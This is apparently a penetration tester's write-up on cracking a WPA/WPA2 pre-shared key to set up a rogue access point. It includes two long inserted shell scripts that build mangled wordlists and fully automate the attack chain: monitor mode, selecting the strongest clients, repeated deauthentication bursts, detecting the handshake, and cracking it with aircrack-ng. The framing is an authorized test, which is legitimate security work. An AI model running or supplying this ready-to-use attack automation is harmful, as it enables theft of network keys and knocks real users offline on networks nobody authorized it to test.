I was given the opportunity to run some tests against the wireless infrastructure at my office. The actual scenario is to deploy a rogue access point and start gathering intel on the organization. But I decided to take this a step further and do some pre-work to make a convincing rogue AP. What follows is the initial framework I developed while researching how to crack a WPA/WPA2 pre-shared key network. I’ll revisit this and improve on it as I gain more experience.
The goal of this exercise is to gain the pre-shared key used on the WPA/WPA2 wireless network. That key is what makes a rogue access point convincing: it can be set up with the same SSID and the same passphrase, so clients already configured for the real network will join it.
- Build your Word Lists for brute forcing
- Grab some of the password dumps available on the internet
- OSINT your target(s) to build a list of words and phrases commonly used to build passwords (family and pet names, important dates like birthdays, favorite places, etc.)
- Once you have determined the target's website(s), use CeWL to harvest possible wordlist entries from them.
- Sort and filter your list to remove duplicates.
`sort file > newfile` to sort alphabetically only
`sort file | uniq > newfile` to sort and remove exact duplicates (`sort -u` does both in one step). `uniq -i` would ignore case, but a WPA passphrase is case-sensitive, so that throws away "Fluffy2015" when "fluffy2015" is already in the list; keep case variants and let the mangling step below generate more of them.
- put anything you think might have a higher probability of success near the front of the wordlist.
- Use Mentalist to generate alternative/mangled words based on your base word lists.
The word lists you generate can likely be re-used for other bruteforcing attacks against the target.
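As an added example that is not part of the original post, here is a small POSIX shell helper for the sort/dedup step above with the two checks worth having: it keeps whatever list you pass first (the OSINT guesses) in front, deduplicates exactly rather than case-insensitively, and drops anything outside the 8 to 63 character range a WPA/WPA2 passphrase must have, so the cracker does not waste time on lines it would skip anyway. The `mangle` helper is a tiny stand-in for a Mentalist rule chain; its year range and the file names in the demo are assumptions, and the demo data is constructed, not a real dump.

```sh
#!/bin/sh
# Added example, not part of the original post.
# build_wordlist / mangle: assemble a WPA-PSK candidate list from several
# sources, most likely guesses first. Assumed input: one candidate per line.
set -eu

# mangle FILE: emit each base word plus a few cheap variants (capitalised,
# year suffixes, trailing '!'). A tiny stand-in for a Mentalist rule chain;
# the year range is an assumption, adjust it to the target.
mangle() {
    awk '{
        w = $0; c = toupper(substr(w, 1, 1)) substr(w, 2)
        print w; print c
        for (y = 2015; y <= 2019; y++) { print w y; print c y }
        print w "!"; print c "!"
    }' "$1"
}

# build_wordlist OUT FILE...: concatenate the inputs in the order given (put
# the OSINT/priority list first so it is tried first), strip CR from dumps
# saved on Windows, keep only valid WPA/WPA2 passphrase lengths (8-63
# characters) and drop exact duplicates while keeping the first occurrence.
# Dedup is case-sensitive on purpose: the PSK is case-sensitive, so
# 'Fluffy2015' and 'fluffy2015' are different candidates. Prints the count.
build_wordlist() {
    out=$1; shift
    cat "$@" \
      | tr -d '\r' \
      | awk 'length($0) >= 8 && length($0) <= 63' \
      | awk '!seen[$0]++' \
      > "$out"
    wc -l < "$out" | tr -d ' '
}

# Demo on constructed data (not real dumps or real OSINT):
demo_dir=$(mktemp -d)
printf 'Fluffy2015\nshort\nFluffy2015\n' > "$demo_dir/priority.txt"
printf 'fluffy\nsummer\n' > "$demo_dir/osint.txt"
printf 'password123\nfluffy2015\nwinter2019!\n' > "$demo_dir/dump.txt"
mangle "$demo_dir/osint.txt" > "$demo_dir/mangled.txt"
build_wordlist "$demo_dir/wordlist.txt" "$demo_dir/priority.txt" \
    "$demo_dir/mangled.txt" "$demo_dir/dump.txt"
head -n 5 "$demo_dir/wordlist.txt"
```

Feed the output file straight to aircrack-ng's `-w`; because the priority entries are at the top, a hit from OSINT shows up within seconds instead of after the whole dump has been tried.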
Get the WPA Authentication
- Determine the wireless interface chipset and capabilities (if you do not already know them); the driver must support monitor mode (RFMON).
`lspci -vv` to find the card and driver info (for a USB adapter it is lsusb instead).
- Or the old standby: open the case and look at the card’s labelling.
`iwconfig` to get the interface name (e.g. wlan0).
`airmon-ng check kill` kills the processes that would fight the card for control while it is in monitor mode: mainly NetworkManager, wpa_supplicant and dhclient. That is why the machine drops off the network until they are started again.
`airmon-ng start wlan0` puts the card into monitor mode and creates the wlan0mon monitoring interface.
- The same thing can be done by hand (bring the interface down with ip, set its type to monitor with iw, bring it back up), but airmon-ng also handles the driver-specific quirks, so there is little reason to.
`airodump-ng wlan0mon` to survey the available networks. Look for the SSID you know or suspect belongs to the target.
- Be cautious about neighboring wireless networks you are not authorized to test.
- If you already know the SSID being used, `airodump-ng --essid [clientssid] wlan0mon` narrows the survey to it.
- Once you have found the target, make a note of its BSSID and channel, then hit Ctrl-C to stop the survey.
`airodump-ng -c [channel] --bssid [target-bssid] -w /path/to/capture wlan0mon` locks the card on the target's channel and creates the capture files; the .cap file written under that prefix is what the cracker needs.
- Watch for a bit and make sure this AP is active (if there are multiple APs serving the same SSID, the one you picked might not be).
- Note the client MACs of a few of the stronger, actively transmitting clients in the STATION section (power is in dBm, so -45 is stronger than -70).
- Leave this terminal open: airodump-ng shows "WPA handshake: [target-bssid]" in its top line once it has captured one.
- Open a new terminal and deauth a client to try to catch the reauthentication.
`aireplay-ng -0 2 -a [target-bssid] -c [target-client] wlan0mon` sends two deauthentication bursts to that client. The card has to stay on the target's channel for this, which the airodump-ng still running in the other terminal takes care of.
- I had problems using -0 10 or higher when trying to grab a client from a multi-ap network on a cisco wireless controller. There may have been some anti-hacking protections coming into place…need to research.
- Cross your fingers and hope the client reauthenticates to the same AP, not to another AP on the same SSID sitting on a different channel.
- If you do not catch the first client's reauthentication, try the second or try again. Just don't be too obvious: every deauth knocks a real user off the network. If the network enforces 802.11w (Protected Management Frames), forged deauthentication frames are simply ignored and this step will not work at all.
- If you cannot catch the handshake, look at the troubleshooting section in Sunny Hoi’s post mentioned below.
- If you successfully catch the WPA handshake, you can shut down the capture.
- Stopping the monitor interface and restarting NetworkManager normally gets Kali back on the wireless as a client without a reboot.
Cracking the WPA Password
- Pull the capture files down to your cracking machine if it is different from your capture machine.
- `aircrack-ng -a2 -b [target-bssid] -w /path/to/word/list /path/to/capture.cap` (`-a2` selects WPA-PSK cracking; the .cap file is the one airodump-ng wrote under the prefix you gave to -w)
- Let it churn until it finds the password (or not). aircrack-ng only tests candidates of 8 to 63 characters, so shorter lines in the wordlist are skipped, not tried.
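As an added example that is not part of the original post, the survey, deauth, capture and crack steps above as one POSIX shell script. It assumes the aircrack-ng suite, tshark and coreutils `timeout` are installed, that the adapter is wlan0 and that airmon-ng names the monitor interface wlan0mon, and that airodump-ng writes `<prefix>-01.cap` and `<prefix>-01.csv`. The two CSV helpers pick the channel and the strongest associated clients out of airodump-ng's CSV output instead of reading them off the screen, and the deauth loop stops as soon as EAPOL frames show up in the capture. Run it only against a BSSID you are authorized to test.

```sh
#!/bin/sh
# Added example, not part of the original post: the survey, deauth, capture
# and crack steps as one script. Assumed tools: aircrack-ng suite, tshark,
# coreutils timeout. Assumed names: adapter wlan0, monitor interface wlan0mon,
# capture files <prefix>-01.cap and <prefix>-01.csv.
set -eu

IFACE=${IFACE:-wlan0}
MON=${MON:-wlan0mon}

# ap_channel CSV BSSID: channel of the target AP, read from the AP section of
# airodump-ng's CSV (fields are comma-separated with padding spaces).
ap_channel() {
    awk -F', *' -v b="$2" '/^Station MAC/ {exit} $1 == b {print $4; exit}' "$1"
}

# strongest_clients CSV BSSID [N]: MACs of up to N clients associated with
# BSSID, strongest signal first. Power is in dBm, so -45 beats -70; stations
# listed as "(not associated)" never match the BSSID and are skipped.
strongest_clients() {
    awk -F', *' -v b="$2" '
        /^Station MAC/ {st = 1; next}
        st && $6 == b  {print $4, $1}' "$1" \
      | sort -k1,1nr | head -n "${3:-3}" | awk '{print $2}'
}

# eapol_frames CAP: number of EAPOL frames in the capture. A full 4-way
# handshake is four frames; aircrack-ng can manage with M1+M2 or M2+M3, so
# fewer than two means keep trying.
eapol_frames() {
    tshark -r "$1" -Y eapol 2>/dev/null | wc -l | tr -d ' '
}

# enable_monitor: kill NetworkManager/wpa_supplicant/dhclient, start $MON.
enable_monitor() {
    airmon-ng check kill
    airmon-ng start "$IFACE"
}

# restore_managed: undo enable_monitor without a reboot.
restore_managed() {
    airmon-ng stop "$MON"
    systemctl start NetworkManager 2>/dev/null || service NetworkManager start
}

# capture_handshake BSSID CHANNEL PREFIX CLIENT...: lock airodump-ng on the
# target, deauth each client in turn (two bursts each; larger counts were
# unreliable against the controller-based network described above) and stop
# as soon as EAPOL frames appear. Use a fresh PREFIX: airodump-ng numbers
# its files -01, -02, ... if the prefix was used before.
capture_handshake() {
    bssid=$1; chan=$2; prefix=$3; shift 3
    airodump-ng -c "$chan" --bssid "$bssid" -w "$prefix" "$MON" >/dev/null 2>&1 &
    dump=$!
    sleep 10                                  # let it lock on and list clients
    for client in "$@"; do
        aireplay-ng -0 2 -a "$bssid" -c "$client" "$MON"
        sleep 15                              # give the client time to reconnect
        if [ "$(eapol_frames "$prefix-01.cap")" -ge 2 ]; then
            kill "$dump"; return 0
        fi
    done
    kill "$dump"; return 1
}

# crack PREFIX BSSID WORDLIST: -a2 selects WPA-PSK.
crack() {
    aircrack-ng -a2 -b "$2" -w "$3" "$1-01.cap"
}

# Full run, only when asked for (sourcing the file just defines the helpers):
#   BSSID=xx:xx:xx:xx:xx:xx WORDLIST=wordlist.txt PREFIX=/tmp/wpa sh wpa.sh run
if [ "${1:-}" = run ]; then
    : "${BSSID:?set BSSID to the in-scope target AP}" "${WORDLIST:?set WORDLIST}"
    PREFIX=${PREFIX:-/tmp/wpa}
    enable_monitor
    # 30 s survey, CSV only, filtered to the target; timeout exits 124 on expiry
    timeout 30 airodump-ng --bssid "$BSSID" --output-format csv \
        -w "$PREFIX-survey" "$MON" >/dev/null 2>&1 || true
    chan=$(ap_channel "$PREFIX-survey-01.csv" "$BSSID")
    clients=$(strongest_clients "$PREFIX-survey-01.csv" "$BSSID" 3)
    # $clients is deliberately unquoted: one MAC per line becomes one arg each
    if [ -n "$chan" ] && [ -n "$clients" ] \
       && capture_handshake "$BSSID" "$chan" "$PREFIX" $clients; then
        crack "$PREFIX" "$BSSID" "$WORDLIST"
    else
        echo "no handshake captured: no active client, or it roamed elsewhere" >&2
    fi
    restore_managed
fi
```

The EAPOL count is a heuristic, not proof of a usable handshake: frames from two different clients, or a retransmitted M1 with no M2, also count. If aircrack-ng later reports no valid handshake, run the capture step again rather than retrying the crack.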
Wireless interface cards used successfully:
- Intel Dual Band Wireless-AC 7260 7260NGW (FCC ID PD97260NGU): The card worked moderately well on both bands, but it seemed to have issues when the capture ran for more than 15-20 minutes.
Credit Where Credit is Due
- Overall Process - Sunny Hoi has an excellent guide for WPA cracking using Kali. In fact, most of this document is based on it. I strongly recommend you give this link a detailed read.
- Building custom word lists - Null-Byte has a couple great write-ups on building custom wordlists with OSINT, CUPP and Mentalist and scraping a website for words using CeWL.